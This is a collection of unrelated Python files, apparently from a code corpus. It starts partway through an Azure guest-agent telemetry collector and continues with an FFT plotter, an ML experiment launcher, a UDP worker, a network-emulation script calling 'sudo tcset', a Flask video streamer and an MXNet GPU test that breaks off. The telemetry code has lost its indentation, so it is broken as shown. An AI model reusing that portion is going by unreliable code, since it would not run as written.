:param handler_event_dir_path: Full path. Eg: '/var/log/azure/Microsoft.CPlat.Core.RunCommandLinux/events'
"""
# Filter out the files that do not follow the pre-defined EXTENSION_EVENT_FILE_NAME_REGEX
event_files = [event_file for event_file in os.listdir(handler_event_dir_path) if
re.match(self._EXTENSION_EVENT_FILE_NAME_REGEX, event_file) is not None]
# Pick the latest files first; older events are discarded once the per-period limit is reached
event_files.sort(reverse=True)
captured_extension_events_count = 0
dropped_events_with_error_count = defaultdict(int)
try:
for event_file in event_files:
event_file_path = os.path.join(handler_event_dir_path, event_file)
try:
logger.verbose("Processing event file: {0}", event_file_path)
if not self._event_file_size_allowed(event_file_path):
continue
# We support multiple events in a file, read the file and parse events.
captured_extension_events_count = self._enqueue_events_and_get_count(handler_name, event_file_path,
captured_extension_events_count,
dropped_events_with_error_count)
# We only allow MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD=300 maximum events per period per handler
if captured_extension_events_count >= self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD:
msg = "Reached max count for the extension: {0}; Max Limit: {1}. Skipping the rest.".format(
handler_name, self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD)
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
break
except ServiceStoppedError:
# Not logging here as already logged once, re-raising
# Since we already started processing this file, deleting it as we could've already sent some events out
# This is a trade-off between data replication vs data loss.
raise
except Exception as error:
msg = "Failed to process event file {0}:{1}".format(event_file,
textutil.format_exception(error))
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
finally:
# Todo: We should delete files after ensuring that we sent the data to Wireserver successfully
# from our end rather than deleting first and sending later. This is to ensure the data reliability
# of the agent telemetry pipeline.
os.remove(event_file_path)
finally:
if dropped_events_with_error_count:
msg = "Dropped events for Extension: {0}; Details:\n\t{1}".format(handler_name, '\n\t'.join(
["Reason: {0}; Dropped Count: {1}".format(k, v) for k, v in dropped_events_with_error_count.items()]))
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
if captured_extension_events_count > 0:
logger.info("Collected {0} events for extension: {1}".format(captured_extension_events_count, handler_name))
@staticmethod
def _ensure_all_events_directories_empty(extension_events_directories):
if not extension_events_directories:
return
for extension_handler_with_event_dir in extension_events_directories:
event_dir_path = extension_handler_with_event_dir[1]
if not os.path.exists(event_dir_path):
return
log_err = True
# Delete any residue files in the events directory
for residue_file in os.listdir(event_dir_path):
try:
os.remove(os.path.join(event_dir_path, residue_file))
except Exception as error:
# Only log the first error once per handler per run to keep the logfile clean
if log_err:
logger.error("Failed to completely clear the {0} directory. Exception: {1}", event_dir_path,
ustr(error))
log_err = False
def _enqueue_events_and_get_count(self, handler_name, event_file_path, captured_events_count,
dropped_events_with_error_count):
event_file_time = datetime.datetime.fromtimestamp(os.path.getmtime(event_file_path))
# Read event file and decode it properly
with open(event_file_path, "rb") as event_file_descriptor:
event_data = event_file_descriptor.read().decode("utf-8")
# Parse the string and get the list of events
events = json.loads(event_data)
# We allow multiple events in a file but there can be an instance where the file only has a single
# JSON event and not a list. Handling that condition too
if not isinstance(events, list):
events = [events]
for event in events:
try:
self._send_telemetry_events_handler.enqueue_event(
self._parse_telemetry_event(handler_name, event, event_file_time)
)
captured_events_count += 1
except InvalidExtensionEventError as invalid_error:
# These are the errors thrown if there's an error parsing the event. We want to report these back to the
# extension publishers so that they are aware of the issues.
# The error messages are all static messages, we will use this to create a dict and emit an event at the
# end of each run to notify if there were any errors parsing events for the extension
dropped_events_with_error_count[ustr(invalid_error)] += 1
except ServiceStoppedError as stopped_error:
logger.error(
"Unable to enqueue events as service stopped: {0}. Stopping collecting extension events".format(
ustr(stopped_error)))
raise
except Exception as error:
logger.warn("Unable to parse and transmit event, error: {0}".format(error))
if captured_events_count >= self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD:
break
return captured_events_count
def _parse_telemetry_event(self, handler_name, extension_unparsed_event, event_file_time):
"""
Parse the Json event file and convert it to TelemetryEvent object with the required data.
:return: Complete TelemetryEvent with all required fields filled up properly. Raises if event breaches contract.
"""
extension_event = self._parse_event_and_ensure_it_is_valid(extension_unparsed_event)
# Create a telemetry event, add all common parameters to the event
# and then overwrite all the common params with extension events params if same
event = TelemetryEvent(TELEMETRY_LOG_EVENT_ID, TELEMETRY_LOG_PROVIDER_ID)
event.file_type = "json"
CollectTelemetryEventsHandler.add_common_params_to_telemetry_event(event, event_file_time)
replace_or_add_params = {
GuestAgentGenericLogsSchema.EventName: "{0}-{1}".format(handler_name, extension_event[
ExtensionEventSchema.Version.lower()]),
GuestAgentGenericLogsSchema.CapabilityUsed: extension_event[ExtensionEventSchema.EventLevel.lower()],
GuestAgentGenericLogsSchema.TaskName: extension_event[ExtensionEventSchema.TaskName.lower()],
GuestAgentGenericLogsSchema.Context1: extension_event[ExtensionEventSchema.Message.lower()],
GuestAgentGenericLogsSchema.Context2: extension_event[ExtensionEventSchema.Timestamp.lower()],
GuestAgentGenericLogsSchema.Context3: extension_event[ExtensionEventSchema.OperationId.lower()],
GuestAgentGenericLogsSchema.EventPid: extension_event[ExtensionEventSchema.EventPid.lower()],
GuestAgentGenericLogsSchema.EventTid: extension_event[ExtensionEventSchema.EventTid.lower()]
}
self._replace_or_add_param_in_event(event, replace_or_add_params)
return event
def _parse_event_and_ensure_it_is_valid(self, extension_event):
"""
Parse the Json event from file. Raise InvalidExtensionEventError if the event breaches pre-set contract.
:param extension_event: The json event from file
:return: Verified Json event that qualifies the contract.
"""
clean_string = lambda x: x.strip() if x is not None else x
event_size = 0
key_err_msg = "{0}: {1} not found"
# Convert the dict to all lower keys to avoid schema confusion.
# Only pick the params that we care about and skip the rest.
event = dict((k.lower(), clean_string(v)) for k, v in extension_event.items() if
k.lower() in self._EXTENSION_EVENT_REQUIRED_FIELDS)
# Trim message and only pick the first 3k chars
message_key = ExtensionEventSchema.Message.lower()
if message_key in event:
event[message_key] = event[message_key][:self._EXTENSION_EVENT_MAX_MSG_LEN]
else:
raise InvalidExtensionEventError(
key_err_msg.format(InvalidExtensionEventError.MissingKeyError, ExtensionEventSchema.Message))
if not event[message_key]:
raise InvalidExtensionEventError(
"{0}: {1} should not be empty".format(InvalidExtensionEventError.EmptyMessageError,
ExtensionEventSchema.Message))
for required_key in self._EXTENSION_EVENT_REQUIRED_FIELDS:
# If all required keys not in event then raise
if required_key not in event:
raise InvalidExtensionEventError(
key_err_msg.format(InvalidExtensionEventError.MissingKeyError, required_key))
# If the event_size > _EXTENSION_EVENT_MAX_SIZE=6k, then raise
if event_size > self._EXTENSION_EVENT_MAX_SIZE:
raise InvalidExtensionEventError(
"{0}: max event size allowed: {1}".format(InvalidExtensionEventError.OversizeEventError,
self._EXTENSION_EVENT_MAX_SIZE))
event_size += len(event[required_key])
return event
@staticmethod
def _replace_or_add_param_in_event(event, replace_or_add_params):
for param in event.parameters:
if param.name in replace_or_add_params:
param.value = replace_or_add_params.pop(param.name)
if not replace_or_add_params:
# All values replaced, return
return
# Add the remaining params to the event
for param_name in replace_or_add_params:
event.parameters.append(TelemetryEventParam(param_name, replace_or_add_params[param_name]))
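
# --- Illustrative sketch (not part of the original agent source) ---
# Standalone illustration of the replace-or-add merge performed by
# _replace_or_add_param_in_event above: parameters that already exist on the
# event are updated in place, and any remaining names are appended.
# "_SketchParam" is a simple stand-in for TelemetryEventParam used only here.
class _SketchParam(object):
    def __init__(self, name, value):
        self.name = name
        self.value = value

def _sketch_replace_or_add(params, updates):
    updates = dict(updates)  # copy so the caller's dict is not mutated
    for param in params:
        if param.name in updates:
            param.value = updates.pop(param.name)
    for name, value in updates.items():
        params.append(_SketchParam(name, value))
    return params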
class _CollectAndEnqueueEvents(PeriodicOperation):
"""
Periodic operation to collect telemetry events located in the events folder and enqueue them for the
SendTelemetryHandler thread.
"""
_EVENT_COLLECTION_PERIOD = datetime.timedelta(minutes=1)
def __init__(self, send_telemetry_events_handler):
super(_CollectAndEnqueueEvents, self).__init__(_CollectAndEnqueueEvents._EVENT_COLLECTION_PERIOD)
self._send_telemetry_events_handler = send_telemetry_events_handler
def _operation(self):
"""
Periodically send any events located in the events folder
"""
try:
if self._send_telemetry_events_handler.stopped():
logger.warn("{0} service is not running, skipping iteration.".format(
self._send_telemetry_events_handler.get_thread_name()))
return
self.process_events()
except Exception as error:
err_msg = "Failure in collecting telemetry events: {0}".format(ustr(error))
add_event(op=WALAEventOperation.UnhandledError, message=err_msg, is_success=False)
def process_events(self):
"""
Returns a list of events that need to be sent to the telemetry pipeline and deletes the corresponding files
from the events directory.
"""
event_directory_full_path = os.path.join(conf.get_lib_dir(), EVENTS_DIRECTORY)
event_files = os.listdir(event_directory_full_path)
debug_info = CollectOrReportEventDebugInfo(operation=CollectOrReportEventDebugInfo.OP_COLLECT)
for event_file in event_files:
try:
match = EVENT_FILE_REGEX.search(event_file)
if match is None:
continue
event_file_path = os.path.join(event_directory_full_path, event_file)
try:
logger.verbose("Processing event file: {0}", event_file_path)
with open(event_file_path, "rb") as event_fd:
event_data = event_fd.read().decode("utf-8")
event = parse_event(event_data)
# "legacy" events are events produced by previous versions of the agent (<= 2.2.46) and extensions;
# they do not include all the telemetry fields, so we add them here
is_legacy_event = match.group('agent_event') is None
if is_legacy_event:
# We'll use the file creation time for the event's timestamp
event_file_creation_time_epoch = os.path.getmtime(event_file_path)
event_file_creation_time = datetime.datetime.fromtimestamp(event_file_creation_time_epoch)
if event.is_extension_event():
_CollectAndEnqueueEvents._trim_legacy_extension_event_parameters(event)
CollectTelemetryEventsHandler.add_common_params_to_telemetry_event(event,
event_file_creation_time)
else:
_CollectAndEnqueueEvents._update_legacy_agent_event(event,
event_file_creation_time)
self._send_telemetry_events_handler.enqueue_event(event)
finally:
# Todo: We should delete files after ensuring that we sent the data to Wireserver successfully
# from our end rather than deleting first and sending later. This is to ensure the data reliability
# of the agent telemetry pipeline.
os.remove(event_file_path)
except ServiceStoppedError as stopped_error:
logger.error(
"Unable to enqueue events as service stopped: {0}, skipping events collection".format(
ustr(stopped_error)))
except UnicodeError as uni_err:
debug_info.update_unicode_error(uni_err)
except Exception as error:
debug_info.update_op_error(error)
debug_info.report_debug_info()
@staticmethod
def _update_legacy_agent_event(event, event_creation_time):
# Ensure that if an agent event is missing a field from the schema defined since 2.2.47, the missing fields
# will be appended, ensuring the event schema is complete before the event is reported.
new_event = TelemetryEvent()
new_event.parameters = []
CollectTelemetryEventsHandler.add_common_params_to_telemetry_event(new_event, event_creation_time)
event_params = dict([(param.name, param.value) for param in event.parameters])
new_event_params = dict([(param.name, param.value) for param in new_event.parameters])
missing_params = set(new_event_params.keys()).difference(set(event_params.keys()))
params_to_add = []
for param_name in missing_params:
params_to_add.append(TelemetryEventParam(param_name, new_event_params[param_name]))
event.parameters.extend(params_to_add)
@staticmethod
def _trim_legacy_extension_event_parameters(event):
"""
This method is called for extension events before they are sent out. Per the agreement with extension
publishers, the parameters that belong to extensions and will be reported intact are Name, Version, Operation,
        OperationSuccess, Message, and Duration. Since there is nothing preventing extensions from populating other
        fields (which belong to the agent), we call this method to trim the remaining parameters, since they will be
        replaced with values coming from the agent.
:param event: Extension event to trim.
:return: Trimmed extension event; containing only extension-specific parameters.
"""
params_to_keep = dict().fromkeys([
GuestAgentExtensionEventsSchema.Name,
GuestAgentExtensionEventsSchema.Version,
GuestAgentExtensionEventsSchema.Operation,
GuestAgentExtensionEventsSchema.OperationSuccess,
GuestAgentExtensionEventsSchema.Message,
GuestAgentExtensionEventsSchema.Duration
])
trimmed_params = []
for param in event.parameters:
if param.name in params_to_keep:
trimmed_params.append(param)
event.parameters = trimmed_params
class CollectTelemetryEventsHandler(ThreadHandlerInterface):
"""
    This handler takes care of fetching the extension telemetry events from the {extension_events_dir} and sending
    them to Kusto for advanced debuggability.
"""
_THREAD_NAME = "TelemetryEventsCollector"
def __init__(self, send_telemetry_events_handler):
self.should_run = True
self.thread = None
self._send_telemetry_events_handler = send_telemetry_events_handler
@staticmethod
def get_thread_name():
return CollectTelemetryEventsHandler._THREAD_NAME
def run(self):
logger.info("Start Extension Telemetry service.")
self.start()
def is_alive(self):
return self.thread is not None and self.thread.is_alive()
def start(self):
self.thread = threading.Thread(target=self.daemon)
self.thread.setDaemon(True)
self.thread.setName(CollectTelemetryEventsHandler.get_thread_name())
self.thread.start()
def stop(self):
"""
Stop server communication and join the thread to main thread.
"""
self.should_run = False
if self.is_alive():
self.thread.join()
def stopped(self):
return not self.should_run
def daemon(self):
periodic_operations = [
_CollectAndEnqueueEvents(self._send_telemetry_events_handler)
]
is_etp_enabled = get_supported_feature_by_name(SupportedFeatureNames.ExtensionTelemetryPipeline).is_supported
logger.info("Extension Telemetry pipeline enabled: {0}".format(is_etp_enabled))
if is_etp_enabled:
periodic_operations.append(_ProcessExtensionEvents(self._send_telemetry_events_handler))
logger.info("Successfully started the {0} thread".format(self.get_thread_name()))
while not self.stopped():
try:
for periodic_op in periodic_operations:
periodic_op.run()
except Exception as error:
logger.warn(
"An error occurred in the Telemetry Extension thread main loop; will skip the current iteration.\n{0}",
ustr(error))
finally:
PeriodicOperation.sleep_until_next_operation(periodic_operations)
@staticmethod
def add_common_params_to_telemetry_event(event, event_time):
reporter = get_event_logger()
reporter.add_common_event_parameters(event, event_time)
|
stdin-plot.py
|
#!/usr/bin/python3
import collections
import sys
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib import style
from matplotlib.lines import Line2D
from threading import Thread
style.use('dark_background')
#style.use('ggplot')
figure = plt.figure()
timedomain = figure.add_subplot(2,1,1)
spectrum = figure.add_subplot(2,1,2)
tdline = Line2D([], [], color='red', linewidth=2)
fdline = Line2D([], [], color='red', linewidth=2)
timedomain.add_line(tdline)
spectrum.add_line(fdline)
timedomain.set_xlim(1, 2200)
timedomain.set_ylim(-100, 100)
spectrum.set_xlim(1, 1100)
spectrum.set_ylim(-70, 0)
# Use a Deque with limited size as a FIFO. This implementation drops old data
# on overflow. Exactly what we need.
fifo = collections.deque(maxlen = 10)
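# e.g. with maxlen=3: after appending 1, 2, 3, 4 the deque holds [2, 3, 4]; the oldest
# frame is silently discarded, so the plot always shows the most recent data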
def readData():
while True:
tmp = sys.stdin.readline().strip().split(" ")
data = np.array(tmp, dtype=np.double)
#print("DataSize:", len(data))
fifo.append(data)
def init():
return fdline,tdline
def update(frame):
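    # Turn one captured frame into the two plot lines: remove the DC offset (mean),
    # apply a Hann window, and plot 20*log10(|FFT|) - 100 dB for the first half of the spectrum.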
if len(frame) == 0:
#print("Nop")
return tdline,fdline
frame = frame - np.mean(frame)
n = len(frame)
if n != 2200:
print("python: ", n)
xs = list(range(1, n + 1))
windowed = np.hanning(n) * frame
fd = np.multiply(20, np.log10(np.abs(np.fft.fft(windowed)))) - 100
n = int(len(fd) / 2)
fd = fd[0:n]
fs = list(range(1, n + 1))
tdline.set_data(xs, frame)
fdline.set_data(fs, fd)
return tdline,fdline
def fetch():
while True:
if len(fifo) == 0:
yield []
else:
yield fifo.popleft()
reader = Thread(target = readData, daemon = True)  # daemon: a blocked stdin read must not keep the process alive after the plot window closes
reader.start()
ani = animation.FuncAnimation(fig = figure,
                              func = update,
                              init_func = init,
                              frames = fetch,
                              interval = 80,
                              repeat = False,
                              blit = True)
plt.show()
|
fit.py
|
import sys
import os
from musket_core.project_paths import *
print(("Adding " + os.path.dirname(sys.path[0]).replace('\\', '/')).encode('ascii', 'replace'))
#sys.path.append(os.path.dirname(sys.path[0]))
sys.path[0] = os.path.dirname(sys.path[0])
print("sys.path:")
print(str(sys.path).replace('\\', '/').encode('ascii', 'replace'))
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0" #,1,2"
import argparse
from musket_core.projects import Workspace
from musket_core import caches, deps_download, fit_callbacks
from musket_core.tools import Launch,ProgressMonitor
import tensorflow as tf
from multiprocessing import Process
try:
#do not remove
import torch
except:
pass
def main():
    parser = argparse.ArgumentParser(description='Analyze experiment metrics.')
parser.add_argument('--project', type=str, required=True,
help='folder to search for experiments')
parser.add_argument('--name', type=str, default="",
help='name of the experiment')
parser.add_argument('--num_gpus', type=int, default=1,
help='number of gpus')
parser.add_argument('--gpus_per_net', type=int, default=1,
                        help='number of gpus per network')
parser.add_argument('--num_workers', type=int, default=1,
help='number of workers')
parser.add_argument('--allow_resume', type=bool, default=False,
help='allow resuming of experiments')
parser.add_argument('--force_recalc', type=bool, default=False,
help='force rebuild reports and predictions')
parser.add_argument('--launch_tasks', type=bool, default=False,
help='launch associated tasks')
parser.add_argument('--only_report', type=bool, default=False,
help='only generate reports')
parser.add_argument('--cache', type=str, default="",
help='cache directory')
parser.add_argument('--folds', type=str, default=None,
help='folds to execute')
parser.add_argument('--time', type=int, default=-1,
help='time to work')
parser.add_argument('--one_process', type=bool, default=False,
help='Start all experiments in one process. Good to use for several small experiments')
parser.add_argument('-d','--download_deps', action='store_true',
help='download dependencies (e.g. dataset) prior to fitting')
if not "--project" in sys.argv:
proj_path = project_path()
print("No --project parameter specified, will use following folder as project: {}".format(proj_path.replace('\\', '/')).encode('ascii', 'replace'))
sys.argv.append("--project")
sys.argv.append(proj_path)
args = parser.parse_args()
if len(args.cache)>0:
caches.CACHE_DIR = args.cache
workspace=Workspace()
project=workspace.project(args.project)
experiments=project.experiments()
if len(args.name)>0:
mmm=args.name.split(",")
res=[]
for x in experiments:
if x.name() in mmm:
res.append(x)
experiments = sorted(res, key = lambda x: mmm.index(x.name()))
else:
experiments=[x for x in experiments if not x.isCompleted()]
if tf.test.gpu_device_name():
print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))
else:
print("Please install GPU version of TF")
folds = args.folds
if folds:
folds = [int(item) for item in folds.split(',')]
if args.download_deps:
deps_download.main(sys.argv)
if len(experiments) == 0:
print("No experiments or all experiments already finished, nothing to launch")
elif args.one_process or len(experiments) == 1:
perform_experiments(workspace, args.gpus_per_net,args.num_gpus,args.num_workers,[x.path for x in experiments],args.allow_resume,args.only_report,args.launch_tasks, folds, args.time)
print("===== All experiments finished =====")
else:
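        # Run each experiment sequentially in its own child process (started and then joined);
        # when the child exits, any per-run framework state such as GPU memory is released before the next run.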
for x in experiments:
p = Process(target=perform_experiments, args=(workspace,args.gpus_per_net,args.num_gpus,args.num_workers,[x.path],args.allow_resume,args.only_report,args.launch_tasks, folds, args.time))
p.start()
p.join()
print("===== All experiments finished =====")
callbacks = fit_callbacks.get_after_fit_callbacks()
if (len(callbacks) > 0):
print("Running {} after-fit callbacks".format(len(callbacks)))
for func in callbacks:
print("Callback {}".format(func.__name__))
func()
    sys.exit(0)
def perform_experiments(workspace, gpus_per_net,num_gpus,num_workers, experiment_paths,allow_resume,only_report,launch_tasks, folds, time):
l=Launch(gpus_per_net,num_gpus,num_workers,experiment_paths,allow_resume,only_report,launch_tasks, folds, time)
l.perform(workspace,ProgressMonitor())
if __name__ == '__main__':
main()
|
worker.py
|
# -*- coding: utf-8 -*-
import json
import threading
import time
import logging
import socket
import random
from register import register
from logger import logger
def get_config(filename='config.json'):
try:
with open(filename) as f:
return json.load(f)
except IOError as err:
logger.error('IOError: %s', err)
except ValueError as err:
logger.error('ValueError: %s', err)
def start_register_thread(config, port_task_worker):
register_config = config['register']
host, port = register_config['host'], register_config['port']
worker_id = config['id']
time_to_live = register_config.get('time_to_live', 60)
thread_register = threading.Thread(
target=register, args=(host, port, worker_id, port_task_worker, time_to_live))
thread_register.daemon = True
thread_register.start()
def main():
logging.basicConfig(level=logging.DEBUG)
config = get_config()
if not config or 'worker' not in config:
        logger.error('Invalid config: file is missing, unreadable or has no "worker" section')
return
logger.debug('config: %s', config)
    # Open a random UDP port here to receive tasks from the dispatcher;
    # the port number will be reported to the dispatcher later.
    # By the way, I forgot about the requirement that the port should be set in the config,
    # but let's call it a feature: to run several workers we won't have to edit the config :)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('0.0.0.0', 0))
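    # Port 0 asks the OS to assign a free ephemeral port; getsockname() below reveals which one was chosen.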
port_task_worker = sock.getsockname()[1]
logger.info('port for recv task: %s', port_task_worker)
    # Worker registration happens in a separate thread
start_register_thread(config['worker'], port_task_worker)
calculation_time = config['worker'].get('calculation_time', (2, 10))
probability_of_failure = config['worker'].get('probability_of_failure', 0.1)
time_of_failure = config['worker'].get('time_of_failure', 15)
    # Main task-processing loop
i = 0
while True:
task, dispatcher = sock.recvfrom(1024)
logger.info('recv task "%s" from %s', task, dispatcher)
time.sleep(random.randint(*calculation_time))
result = 'task %s (%s) done' % (i, task)
sock.sendto(result, dispatcher)
logger.info('send result task %s (%s)', i, task)
if random.random() <= probability_of_failure:
logger.error('broken worker (%s second)', time_of_failure)
time.sleep(time_of_failure)
i += 1
if __name__ == "__main__":
main()
|
dynamic_tc.py
|
"""
This script dynamically changes link/network conditions so that changing networks can be simulated more flexibly.
delay-distro=jitter
https://github.com/Lu-Yi-Hsun/tcconfig#set-traffic-control-tcset-command
sudo tcset s2-eth1 --delay 30ms --rate 10Kbps --loss 50.1% --delay-distro 10ms --overwrite
"""
import zmq
from multiprocessing import Process
import os
import time
import random
def tc(interface="s1-eth1",delay=1,bw=1,loss=0.2,jitter=2):
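    # Build a tcconfig 'tcset' command: --delay-distro adds jitter around the base delay
    # and --overwrite replaces any rule already applied to the interface.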
command="sudo tcset %s --delay %dms --rate %dKbps --loss %f%% --delay-distro %dms --overwrite"%(interface,delay,bw,loss,jitter)
print(command)
print(os.system(command))
def entry(interface_list):
while True:
for i in interface_list:
print(i)
jobs = []
interface=i
delay=random.randint(1, 1000)
bw=1000000
loss=random.randint(0, 100)/100
jitter=random.randint(1, 100)
p1 = Process(target=tc,args=(interface,delay,bw,loss,jitter,))
jobs.append(p1)
p1.start()
for j in jobs:
j.join()
time.sleep(10)
|
streamingService.py
|
import cv2
from CameraLib import baseCamera, faceTracking
from IotLib.log import Log
from IotLib.iotNode import IotNode
from IotLib.pyUtils import startThread
def startVideoStream(camera, config, debug=False):
""" start video stream """
port = config.getOrAddInt('video.httpVideoPort', 8000)
streamer = VideoStream('video', parent=None, camera=camera, config=config, debug=debug)
streamer.startUp()
streamer.runVideoStreaming(port)
def startVideoStreamAsync(camera, config, debug=False):
""" start video stream in a separate thread """
port = config.getOrAddInt('video.httpVideoPort', 8000)
streamer = VideoStream('video', parent=None, camera=camera, config=config, debug=debug)
streamer.startUp()
videoThread=startThread('VideoStream', target=streamer.runVideoStreaming, front=True, args=(port,))
class VideoStream(IotNode):
""" video streaming with optional face tracking """
def __init__(self, name, parent, camera, config, debug=False):
""" construct a PiCamera """
super(VideoStream, self).__init__(name, parent)
self.camera = camera
self.config = config
self.debug = debug
def startUp(self):
""" override to start the components """
width, height = self.camera.resolution()
# update index.html with proper width and height
try:
indexHtmlFile = self.config.getOrAdd('video.indexHtml', '/home/pi/src/VideoLib/templates/index.html')
with open(indexHtmlFile, "w", encoding="utf-8") as f:
url = "{{ url_for('video_feed') }}"
html='<html> <head> <title>Video Streaming</title> </head> <body> <img src="%s" width="%i" height="%i"> </body></html>' %(url, width, height)
f.writelines('%s\n' %(html))
        except Exception:
            # best effort: keep streaming with the existing template if index.html cannot be rewritten
            pass
self.faceTracker = None
enableFaceTracking = self.config.getOrAddBool('video.enableFaceTracking', 'true')
if enableFaceTracking:
filePath = self.config.getOrAdd('video.classifier', '/home/pi/src/data/haarcascade_frontalface_alt.xml')
self.classifier = cv2.CascadeClassifier(filePath)
#self.classifier = cv2.CascadeClassifier('/home/pi/adeept_picar-b/server/data/haarcascade_frontalface_alt.xml')
self.faceTracker = faceTracking.FaceTracker(self.classifier, debug=self.debug)
Log.info('Streaming camera (%i x %i) with classifier: %s' %(width, height, filePath))
else:
self.faceTracker = None
Log.info('Streaming camera (%i x %i)' %(width, height))
def runVideoStreaming(self, port):
""" run video streaming (flask app) as a web. Should be called from a dedicated thread. """
Log.info('starting httpVideoStreaming on port %d' %port)
runVideoStreaming(port, self.camera, tracker=self.faceTracker, debug=self.debug, threaded=True)
from flask import Flask, render_template, Response
_app = Flask(__name__)
# the camera object (derived from BaseCamera) for video capture
_streamingCamera = None
# face tracking object (FaceTracker)
_faceTracker = None
def runVideoStreaming(port, camera, classifier=None, tracker=None, debug=False, threaded=True):
""" run video streaming (flask app) as a web. calling parameters:
port: the port number for the http web
camera: a camera instance that is derived from baseCamera.BaseCamera
classifier: face tracking with FaceTracker using the specified classifier
tracker: face tracking object (FaceTracker or instance of derived class)
debug: whether to run the flask app under debug
threaded: whether to run flask app threaded
"""
global _streamingCamera, _faceTracker
_streamingCamera = camera
    if tracker is not None:
        _faceTracker = tracker
    elif classifier is not None:
        _faceTracker = faceTracking.FaceTracker(classifier, debug=debug)
_app.run(host='0.0.0.0', port=port, debug=debug, threaded=threaded, use_reloader=False)
@_app.route('/')
def index():
"""Video streaming home page."""
return render_template('index.html')
def gen(camera):
"""Video streaming generator function."""
while True:
        tracking = _faceTracker is not None # and opencv_mode != 0
img = camera.get_frame(tracking)
# encode as a jpeg image and return it
frame = cv2.imencode('.jpg', img)[1].tobytes()
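        # each yielded chunk is one part of a multipart/x-mixed-replace response;
        # the browser swaps in every new JPEG as it arrives, producing the video effect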
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
@_app.route('/video_feed')
def video_feed():
""" Video streaming route. """
_streamingCamera.start(_faceTracker)
return Response(gen(_streamingCamera), mimetype='multipart/x-mixed-replace; boundary=frame')
|
simple_print_worker.py
|
#!/usr/bin/env python
# encoding: utf-8
from __future__ import print_function
import multiprocessing
def worker(num):
"""The `num` passed should be pickle-lable"""
print("hello there", num)
return
if __name__ == "__main__":
jobs = []
for i in range(5):
p = multiprocessing.Process(target=worker, args=(i,))
jobs.append(p)
p.start()
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import unittest
import mxnet as mx
import numpy as np
from nose.tools import assert_raises
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal
from mxnet.base import MXNetError
from mxnet import autograd
from numpy.testing import assert_allclose
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed, teardown, assert_raises_cudnn_disabled
from test_operator import *
from test_optimizer import *
from test_random import *
from test_gluon import *
from test_loss import *
from test_exc_handling import *
#from test_rnn import *
from test_gluon_rnn import *
from test_sparse_ndarray import *
from test_sparse_operator import *
from test_ndarray import *
set_default_context(mx.gpu(0))
del test_support_vector_machine_l1_svm # noqa
del test_support_vector_machine_l2_svm # noqa
def check_countsketch(in_dim,out_dim,n):
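    # NumPy reference for count sketch: each input feature is multiplied by its sign hash s and
    # accumulated into the output bucket selected by hash h; forward and backward outputs of
    # mx.sym.contrib.count_sketch are checked against this reference on the GPU.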
data = mx.sym.Variable("data")
h = mx.sym.Variable("h")
s = mx.sym.Variable("s")
sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
locations = {"data": x, "h": h, "s": s}
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
@with_seed()
def test_countsketch():
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1, maxn)
check_countsketch(in_dim, out_dim, n)
def check_ifft(shape):
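    # contrib.ifft consumes interleaved [real, imag] values along the last axis, so odd sizes are
    # rounded up to even and the last dimension is doubled; results are checked against numpy.fft.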
shape_old = shape
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1]*2)
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1],shape[2],shape[3]*2)
sym = mx.sym.contrib.ifft(name='ifft', compute_size = 128)
init = [np.random.normal(size=shape, scale=1.0)]
